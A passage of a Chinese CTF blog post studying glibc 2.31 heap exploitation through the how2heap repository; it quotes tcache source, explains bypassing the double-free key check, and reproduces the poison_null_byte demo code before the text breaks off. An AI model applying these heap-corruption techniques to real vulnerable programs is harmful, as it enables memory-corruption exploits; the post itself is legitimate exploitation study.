

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/pics/cat.jpg">
  <link rel="icon" href="/pics/cat.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Luo">
  <meta name="keywords" content="">
  
    <meta name="description" content="how2heap奥, 看👴干不干你就完🌶️:">
<meta property="og:type" content="article">
<meta property="og:title" content="How2HE4p!">
<meta property="og:url" content="http://example.com/2023/10/31/How2HEAP/index.html">
<meta property="og:site_name" content="Luo&#39;s B1oG">
<meta property="og:description" content="how2heap奥, 看👴干不干你就完🌶️:">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/pics/h2h.png">
<meta property="article:published_time" content="2023-10-31T09:36:54.000Z">
<meta property="article:modified_time" content="2023-10-31T14:25:14.063Z">
<meta property="article:author" content="Luo">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/pics/h2h.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>How2HE4p! - Luo&#39;s B1oG</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5-a","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Luo&#39;s B1oG</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/pics/h2h.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="How2HE4p!"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-10-31 17:36" pubdate>
          October 31, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          12k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          103 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">How2HE4p!</h1>
            
            
              <div class="markdown-body">
                
                <p>how2heap奥, 看👴干不干你就完🌶️:</p>
<span id="more"></span>
<h2 id="0x00">0x00</h2>
<p>newstar今年week4非常的离奇, 除了一道2.23的doublefree, 那玩意给个勾来都秒了, 剩下全是2.31.</p>
<blockquote>
<p>后话是其中一道2.31居然是逆向题, 跟堆毫无关系</p>
</blockquote>
<p>踏马的, 看了看我贫瘠的堆题水平, 我发现我几乎就没怎么做过高版本的题, 2.31的水平仅限于最初级的tcache poisoning这种, 痛定思痛, 准备推一下how2heap.</p>
<p>这篇文章的进度预计是直接从2.31开推, 跟着源码一起看.</p>
<blockquote>
<p>以下是本文所用的资源:</p>
<p>how2heap:<a target="_blank" rel="noopener" href="https://github.com/shellphish/how2heap">how2heap</a></p>
<p>roderick大神的博客:<a target="_blank" rel="noopener" href="https://www.roderickchan.cn/zh-cn/2023-02-27-house-of-all-about-glibc-heap-exploitation/">Glibc堆利用之house of系列总结 - roderick - record and learn! (roderickchan.cn)</a></p>
<p>源码网站: <a target="_blank" rel="noopener" href="https://elixir.bootlin.com/glibc/glibc-2.31/source/malloc/malloc.c#L2913">malloc.c - malloc/malloc.c - Glibc source code (glibc-2.31) - Bootlin</a></p>
<p>知乎上的一个专门的2.31的文章:<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/136983333">Heap Exploit v2.31(zhihu.com)</a>,how2heap仓库下面有一个专门的2.31其实似乎就是这篇文章</p>
</blockquote>
<h2 id="0x01-2️⃣-3️⃣1️⃣">0x01 2️⃣.3️⃣1️⃣</h2>
<p>我们首先从tcache本身的一些东西入手:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">typedef</span> <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">tcache_entry</span></span><br><span class="hljs-class">&#123;</span><br>  <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">tcache_entry</span> *<span class="hljs-title">next</span>;</span><br>  <span class="hljs-comment">/* This field exists to detect double frees.  */</span><br>  <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">tcache_perthread_struct</span> *<span class="hljs-title">key</span>;</span><br>&#125; tcache_entry;<br></code></pre></td></tr></table></figure>
<p>2.31中, 我们可以看到原有的<code>tcache_entry</code>结构相较于2.27加了一层保护, 这层保护应用于2.29及以后的版本, 使用了一个key段, 该段位于chunk的bk段,</p>
<p>然后<code>tcache_put</code>函数中对key段做了一些手脚, 设置其值为tcache结构体的地址:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs c">tcache_put (mchunkptr chunk, <span class="hljs-type">size_t</span> tc_idx)<br>&#123;<br>  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);<br><br>  <span class="hljs-comment">/* Mark this chunk as &quot;in the tcache&quot; so the test in _int_free will</span><br><span class="hljs-comment">     detect a double free.  */</span><br>  e-&gt;key = tcache;<br><br>  e-&gt;next = tcache-&gt;entries[tc_idx];<br>  tcache-&gt;entries[tc_idx] = e;<br>  ++(tcache-&gt;counts[tc_idx]);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>如注释所说, 这一句话的作用是设置标志位, 将其置于tcache中, 防止double free.</p>
<p>这个保护在free处是这样的:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">if</span> USE_TCACHE</span><br>  &#123;<br>    <span class="hljs-type">size_t</span> tc_idx = csize2tidx (size);<br>    <span class="hljs-keyword">if</span> (tcache != <span class="hljs-literal">NULL</span> &amp;&amp; tc_idx &lt; mp_.tcache_bins)<br>      &#123;<br>	<span class="hljs-comment">/* Check to see if it&#x27;s already in the tcache.  */</span><br>	tcache_entry *e = (tcache_entry *) chunk2mem (p);<br><br>	<span class="hljs-comment">/* This test succeeds on double free.  However, we don&#x27;t 100%</span><br><span class="hljs-comment">	   trust it (it also matches random payload data at a 1 in</span><br><span class="hljs-comment">	   2^&lt;size_t&gt; chance), so verify it&#x27;s not an unlikely</span><br><span class="hljs-comment">	   coincidence before aborting.  */</span><br>	<span class="hljs-keyword">if</span> (__glibc_unlikely (e-&gt;key == tcache))<br>	  &#123;<br>	    tcache_entry *tmp;<br>	    LIBC_PROBE (memory_tcache_double_free, <span class="hljs-number">2</span>, e, tc_idx);<br>	    <span class="hljs-keyword">for</span> (tmp = tcache-&gt;entries[tc_idx];<br>		 tmp;<br>		 tmp = tmp-&gt;next)<br>	      <span class="hljs-keyword">if</span> (tmp == e)<br>		malloc_printerr (<span class="hljs-string">&quot;free(): double free detected in tcache 2&quot;</span>);<br>	    <span class="hljs-comment">/* If we get here, it was a coincidence.  We&#x27;ve wasted a</span><br><span class="hljs-comment">	       few cycles, but don&#x27;t abort.  */</span><br>	  &#125;<br><br>	<span class="hljs-keyword">if</span> (tcache-&gt;counts[tc_idx] &lt; mp_.tcache_count)<br>	  &#123;<br>	    tcache_put (p, tc_idx);<br>	    <span class="hljs-keyword">return</span>;<br>	  &#125;<br>      &#125;<br>  &#125;<br></code></pre></td></tr></table></figure>
<p>我们可以看见, free时当key段是tcache时并不是直接挂掉, 而是通过tmp指针在entry链上逐个检查, 如果tmp指针与e(即chunk)的指针值相等,则认为是double free. 之前的tcache double free相当随意, 但是这个检查的绕过似乎也相当随意, 由于在检查时首先看的是key段, 所以只需要改掉key段即可.</p>
<p>这属于是最基础层面上的一些东西, 接下来看看how2heap里面的:</p>
<h3 id="1-1-poison-null-byte">1.1 poison_null_byte</h3>
<p>源码我还是整段的放一下吧:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;string.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;assert.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>&#123;<br>	setbuf(<span class="hljs-built_in">stdin</span>, <span class="hljs-literal">NULL</span>);<br>	setbuf(<span class="hljs-built_in">stdout</span>, <span class="hljs-literal">NULL</span>);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Welcome to poison null byte!&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Tested in Ubuntu 20.04 64bit.&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;This technique can be used when you have an off-by-one into a malloc&#x27;ed region with a null byte.&quot;</span>);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Some of the implementation details are borrowed from https://github.com/StarCross-Tech/heap_exploit_2.31/blob/master/off_by_null.c\n&quot;</span>);<br><br>	<span class="hljs-comment">// step1: allocate padding</span><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Step1: allocate a large padding so that the fake chunk&#x27;s addresses&#x27;s lowest 2nd byte is \\x00&quot;</span>);<br>	<span class="hljs-type">void</span> *tmp = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x1</span>);<br>	<span class="hljs-type">void</span> *heap_base = (<span class="hljs-type">void</span> *)((<span class="hljs-type">long</span>)tmp &amp; (~<span class="hljs-number">0xfff</span>)); <span class="hljs-comment">//页对齐</span><br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;heap address: %p\n&quot;</span>, heap_base);<br>	<span class="hljs-type">size_t</span> size = <span class="hljs-number">0x10000</span> - ((<span class="hljs-type">long</span>)tmp&amp;<span class="hljs-number">0xffff</span>) - <span class="hljs-number">0x20</span>; <span class="hljs-comment">//构造个能对到0000的size</span><br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Calculate padding chunk size: 0x%lx\n&quot;</span>, size);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Allocate the padding. This is required to avoid a 4-bit bruteforce because we are going to overwrite least significant two bytes.&quot;</span>);<br>	<span class="hljs-type">void</span> *padding= <span class="hljs-built_in">malloc</span>(size);<br><br>	<span class="hljs-comment">// step2: allocate prev chunk and victim chunk</span><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;\nStep2: allocate two chunks adjacent to each other.&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Let&#x27;s call the first one &#x27;prev&#x27; and the second one &#x27;victim&#x27;.&quot;</span>);<br>	<span class="hljs-type">void</span> *prev = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x500</span>);<br>	<span class="hljs-type">void</span> *victim = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x4f0</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;malloc(0x10) to avoid consolidation&quot;</span>);<br>	<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;prev chunk: malloc(0x500) = %p\n&quot;</span>, prev);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;victim chunk: malloc(0x4f0) = %p\n&quot;</span>, victim);<br><br>	<span class="hljs-comment">// step3: link prev into largebin</span><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;\nStep3: Link prev into largebin&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;This step is necessary for us to forge a fake chunk later&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;The fd_nextsize of prev and bk_nextsize of prev will be the fd and bck pointers of the fake chunk&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;allocate a chunk &#x27;a&#x27; with size a little bit smaller than prev&#x27;s&quot;</span>);<br>	<span class="hljs-type">void</span> *a = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x4f0</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;a: malloc(0x4f0) = %p\n&quot;</span>, a);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;malloc(0x10) to avoid consolidation&quot;</span>);<br>	<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;allocate a chunk &#x27;b&#x27; with size a little bit larger than prev&#x27;s&quot;</span>);<br>	<span class="hljs-type">void</span> *b = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x510</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;b: malloc(0x510) = %p\n&quot;</span>, b);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;malloc(0x10) to avoid consolidation&quot;</span>);<br>	<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x10</span>);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;\nCurrent Heap Layout\n&quot;</span><br>		 <span class="hljs-string">&quot;    ... ...\n&quot;</span><br>		 <span class="hljs-string">&quot;padding\n&quot;</span><br>		 <span class="hljs-string">&quot;    prev Chunk(addr=0x??0010, size=0x510)\n&quot;</span><br>     	 <span class="hljs-string">&quot;  victim Chunk(addr=0x??0520, size=0x500)\n&quot;</span><br>		 <span class="hljs-string">&quot; barrier Chunk(addr=0x??0a20, size=0x20)\n&quot;</span><br>		 <span class="hljs-string">&quot;       a Chunk(addr=0x??0a40, size=0x500)\n&quot;</span><br>		 <span class="hljs-string">&quot; barrier Chunk(addr=0x??0f40, size=0x20)\n&quot;</span><br>		 <span class="hljs-string">&quot;       b Chunk(addr=0x??0f60, size=0x520)\n&quot;</span><br>		 <span class="hljs-string">&quot; barrier Chunk(addr=0x??1480, size=0x20)\n&quot;</span>);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Now free a, b, prev&quot;</span>);<br>	<span class="hljs-built_in">free</span>(a);<br>	<span class="hljs-built_in">free</span>(b);<br>	<span class="hljs-built_in">free</span>(prev);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;current unsorted_bin:  header &lt;-&gt; [prev, size=0x510] &lt;-&gt; [b, size=0x520] &lt;-&gt; [a, size=0x500]\n&quot;</span>);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Allocate a huge chunk to enable sorting&quot;</span>);<br>	<span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x1000</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;current large_bin:  header &lt;-&gt; [b, size=0x520] &lt;-&gt; [prev, size=0x510] &lt;-&gt; [a, size=0x500]\n&quot;</span>);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;This will add a, b and prev to largebin\nNow prev is in largebin&quot;</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;The fd_nextsize of prev points to a: %p\n&quot;</span>, ((<span class="hljs-type">void</span> **)prev)[<span class="hljs-number">2</span>]+<span class="hljs-number">0x10</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;The bk_nextsize of prev points to b: %p\n&quot;</span>, ((<span class="hljs-type">void</span> **)prev)[<span class="hljs-number">3</span>]+<span class="hljs-number">0x10</span>);<br><br>	<span class="hljs-comment">// step4: allocate prev again to construct fake chunk</span><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;\nStep4: Allocate prev again to construct the fake chunk&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Since large chunk is sorted by size and a&#x27;s size is smaller than prev&#x27;s,&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;we can allocate 0x500 as before to take prev out&quot;</span>);<br>	<span class="hljs-type">void</span> *prev2 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x500</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;prev2: malloc(0x500) = %p\n&quot;</span>, prev2);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Now prev2 == prev, prev2-&gt;fd == prev2-&gt;fd_nextsize == a, and prev2-&gt;bk == prev2-&gt;bk_nextsize == b&quot;</span>);<br>	assert(prev == prev2);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;The fake chunk is contained in prev and the size is smaller than prev&#x27;s size by 0x10&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;So set its size to 0x501 (0x510-0x10 | flag)&quot;</span>);<br>	((<span class="hljs-type">long</span> *)prev)[<span class="hljs-number">1</span>] = <span class="hljs-number">0x501</span>;<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;And set its prev_size(next_chunk) to 0x500 to bypass the size==prev_size(next_chunk) check&quot;</span>);<br>	*(<span class="hljs-type">long</span> *)(prev + <span class="hljs-number">0x500</span>) = <span class="hljs-number">0x500</span>;<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;The fake chunk should be at: %p\n&quot;</span>, prev + <span class="hljs-number">0x10</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;use prev&#x27;s fd_nextsize &amp; bk_nextsize as fake_chunk&#x27;s fd &amp; bk&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Now we have fake_chunk-&gt;fd == a and fake_chunk-&gt;bk == b&quot;</span>);<br><br>	<span class="hljs-comment">// step5: bypass unlinking</span><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;\nStep5: Manipulate residual pointers to bypass unlinking later.&quot;</span>);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Take b out first by allocating 0x510&quot;</span>);<br>	<span class="hljs-type">void</span> *b2 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x510</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Because of the residual pointers in b, b-&gt;fd points to a right now: %p\n&quot;</span>, ((<span class="hljs-type">void</span> **)b2)[<span class="hljs-number">0</span>]+<span class="hljs-number">0x10</span>);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;We can overwrite the least significant two bytes to make it our fake chunk.\n&quot;</span><br>			<span class="hljs-string">&quot;If the lowest 2nd byte is not \\x00, we need to guess what to write now\n&quot;</span>);<br>	((<span class="hljs-type">char</span>*)b2)[<span class="hljs-number">0</span>] = <span class="hljs-string">&#x27;\x10&#x27;</span>;<br>	((<span class="hljs-type">char</span>*)b2)[<span class="hljs-number">1</span>] = <span class="hljs-string">&#x27;\x00&#x27;</span>;  <span class="hljs-comment">// b-&gt;fd &lt;- fake_chunk</span><br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;After the overwrite, b-&gt;fd is: %p, which is the chunk pointer to our fake chunk\n&quot;</span>, ((<span class="hljs-type">void</span> **)b2)[<span class="hljs-number">0</span>]);<br><br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;To do the same to a, we can move it to unsorted bin first&quot;</span><br>			<span class="hljs-string">&quot;by taking it out from largebin and free it into unsortedbin&quot;</span>);<br>	<span class="hljs-type">void</span> *a2 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x4f0</span>);<br>	<span class="hljs-built_in">free</span>(a2);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Now free victim into unsortedbin so that a-&gt;bck points to victim&quot;</span>);<br>	<span class="hljs-built_in">free</span>(victim);<br>	<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;a-&gt;bck: %p, victim: %p\n&quot;</span>, ((<span class="hljs-type">void</span> **)a)[<span class="hljs-number">1</span>], victim);<br>	<span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Again, we take a out and overwrite a-&gt;bck to fake chunk&quot;</span>);<br>	<span class="hljs-type">void</span> *a3 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x4f0</span>);<br>	